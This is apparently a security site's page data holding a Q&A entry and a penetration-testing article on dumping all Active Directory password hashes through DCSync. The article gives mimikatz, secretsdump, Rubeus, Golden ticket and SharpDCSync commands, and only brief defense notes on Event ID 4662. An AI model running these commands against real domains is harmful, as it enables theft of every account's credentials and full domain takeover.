[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzRP2AuuY8K9bAWWu9RRE2ExGzbyE16UKa-0jeY6gXyw":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":48,"createdAt":48,"_status":47},238,"How can an attacker execute DCSync from a domain-joined host that is not a domain controller?","The attacker first obtains a high-privilege ticket—either by generating a Golden ticket with the krbtgt hash using Mimikatz or by using Rubeus to request a TGT for a privileged user. After importing the ticket with SharpTGTImporter, they run SharpDCSync to export hashes. Alternatively, Mimikatz itself can perform DCSync after ticket import or Over pass the hash. For related privilege escalation tactics, see [Domain Penetration - Obtaining DNS Records with Regular User Privileges](\u002Fnews\u002Fdomain-penetration-obtaining-dns-records-with-regular-user-privileges) and [Domain Penetration - Using Specific ACLs in Exchange Server for Domain Privilege Escalation](\u002Fnews\u002Fdomain-penetration-using-specific-acls-in-exchange-server-for-domain-privilege-escalation).","\u003Cp>The attacker first obtains a high-privilege ticket—either by generating a Golden ticket with the krbtgt hash using Mimikatz or by using Rubeus to request a TGT for a privileged user. After importing the ticket with SharpTGTImporter, they run SharpDCSync to export hashes. Alternatively, Mimikatz itself can perform DCSync after ticket import or Over pass the hash. For related privilege escalation tactics, see [Domain Penetration - Obtaining DNS Records with Regular User Privileges](\u002Fnews\u002Fdomain-penetration-obtaining-dns-records-with-regular-user-privileges) and [Domain Penetration - Using Specific ACLs in Exchange Server for Domain Privilege Escalation](\u002Fnews\u002Fdomain-penetration-using-specific-acls-in-exchange-server-for-domain-privilege-escalation).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-method-to-export-all-domain-user-hashes-using-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-execute-dcsync-from-a-domain-joined-host-that-is-not-a-domai-1777484527866","DCSync from domain host, Golden ticket, Rubeus, SharpTGTImporter, SharpDCSync, Over pass the hash",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":37,"qaPairs":38,"meta":44,"updatedAt":45,"createdAt":46,"_status":47},62,"Domain Penetration - Method to Export All Domain User Hashes Using DCSync","domain-penetration-method-to-export-all-domain-user-hashes-using-dcsync","---",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article, 'Domain Penetration - DCSync,' the exploitation methods of DCSync were systematically summarized. This article will provide a detailed introduction to the method of exporting all domain user hashes using DCSync, analyze exploitation approaches in different environments, and offer defense recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Conditions\u003C\u002Fli>\u003Cli>Exploitation Tools\u003C\u002Fli>\u003Cli>Exploitation Approaches\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Conditions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer accounts of domain controllers\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Tools\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.C Implementation (mimikatz)\u003C\u002Fh3>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>Example commands:\u003C\u002Fp>\u003Ch4>(1) Export hashes of all users in the domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Export hash of the administrator account in the domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2.Python Implementation (secretsdump.py)\u003C\u002Fh3>\u003Cp>Example commands:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python secretsdump.py test\u002FAdministrator:DomainAdmin123!@192.168.1.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. PowerShell Implementation (MakeMeEnterpriseAdmin)\u003C\u002Fh3>\u003Cp>Core code implemented in C#, supporting the following three functions:\u003C\u002Fp>\u003Cul>\u003Cli>Export hash of krbtgt user via DCSync\u003C\u002Fli>\u003Cli>Generate Golden ticket using krbtgt user's hash\u003C\u002Fli>\u003Cli>Import Golden ticket\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>My test environment results show that the Golden ticket generation function has a bug; corresponding permissions cannot be obtained after importing the Golden ticket\u003C\u002Fp>\u003Ch3>4. C# Implementation\u003C\u002Fh3>\u003Cp>Based on (MakeMeEnterpriseAdmin), I have made the following modifications:\u003C\u002Fp>\u003Cul>\u003Cli>Support exporting all user hashes\u003C\u002Fli>\u003Cli>Export domain SID\u003C\u002Fli>\u003Cli>Export all domain user SIDs\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>Supplement: Code Development Details\u003C\u002Fh4>\u003Cp>Output all keys and values in the Dictionary:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>foreach(string key in values.Keys)\u003Cbr>{\u003Cbr>    Console.WriteLine(string.Format(\"key:{0} value{1}\", key, values[key]));\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Convert byte array to string for hash output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] data = values[\"ATT_UNICODE_PWD\"] as byte[];\u003Cbr>Console.WriteLine(BitConverter.ToString(data).Replace(\"-\",\"\"));\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Convert string to byte array to transform hash into byte array:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>string hex = \"D4FE97B4FD50367C7AE8FEF781F27A2E\";\u003Cbr>var inputByteArray = new byte[hex.Length \u002F 2];\u003Cbr>for (var x = 0; x &lt; inputByteArray.Length; x++)\u003Cbr>{\u003Cbr>    var i = Convert.ToInt32(hex.Substring(x * 2, 2), 16);\u003Cbr>    inputByteArray[x] = (byte)i;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute on Domain Controller\u003C\u002Fh3>\u003Cp>All tools mentioned in 0x03 can be used\u003C\u002Fp>\u003Ch3>2. Execute on Domain Host\u003C\u002Fh3>\u003Ch4>(1) Mimikatz\u003C\u002Fh4>\u003Cp>There are two exploitation approaches:\u003C\u002Fp>\u003Cul>\u003Cli>Import ticket, execute DCSync\u003C\u002Fli>\u003Cli>Use Over pass the hash to launch script, script executes DCSync\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) secretsdump.py\u003C\u002Fh4>\u003Cp>Execute directly\u003C\u002Fp>\u003Ch4>(3) C Sharp Implementation\u003C\u002Fh4>\u003Cp>First need to generate ticket\u003C\u002Fp>\u003Cp>There are two exploitation approaches:\u003C\u002Fp>\u003Col>\u003Cli>Obtain the hash of the krbtgt user and generate a Golden ticket locally using Mimikatz\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz \"kerberos::golden \u002Fuser:Administrator \u002Fdomain:TEST.COM \u002Fsid:S-1-5-21-254706111-4049838133-2416123456 \u002Fkrbtgt:D4FE97B4FD50367C7AE8FEF781F27A2E \u002Fticket:test.kirbi\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Obtain a high-privilege user and use Rubeus to send a request to obtain a ticket\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asktgt \u002Fuser:administrator \u002Fpassword:123456 \u002Foutfile:test.kirbi\u003Cbr>Rubeus.exe asktgt \u002Fuser:administrator \u002Frc4:D4FE97B4FD50367C7AE8FEF781F27A2E \u002Foutfile:test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Then import the ticket\u003C\u002Fp>\u003Cp>You can choose SharpTGTImporter.cs, the code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>I have made the following modifications based on (MakeMeEnterpriseAdmin):\u003C\u002Fp>\u003Cul>\u003Cli>Supports importing specified ticket files\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpTGTImporter.exe test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Finally execute DCSync\u003C\u002Fp>\u003Cp>To export all user hashes, you can choose SharpDCSync.cs. The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpDCSync.exe dc1.test.com TEST.COM\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To export the krbtgt user hash, you can choose SharpDCSync_krbtgt.cs. The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SharpDCSync_krbtgt.exe dc1.test.com TEST.COM\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Execute on a host outside the domain\u003C\u002Fh3>\u003Cp>Method is the same as \"2. Execute on a host inside the domain\"\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The attacker requires permissions from any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer accounts of domain controllers\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Event log detection can be performed by monitoring Event ID 4662\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blacklanternsecurity.com\u002F2020-12-04-DCSync\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces methods for exporting all user hashes within a domain using DCSync. Based on (MakeMeEnterpriseAdmin), code was developed in SharpTGTImporter.cs and SharpDCSync.cs for ease of exploitation. Combined with exploitation approaches, defensive recommendations are provided.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",3,"published","2026-02-02T08:07:20.755Z",{"title":12,"description":14,"keywords":18,"ogImage":30,"canonicalUrl":30,"noIndex":36},false,[],{"docs":39,"hasNextPage":36},[40,41,4,42,43],240,239,237,236,{"title":30,"description":30,"image":30},"2026-07-24T02:07:27.530Z","2026-07-23T16:01:14.303Z","draft","2026-07-23T16:04:45.747Z"]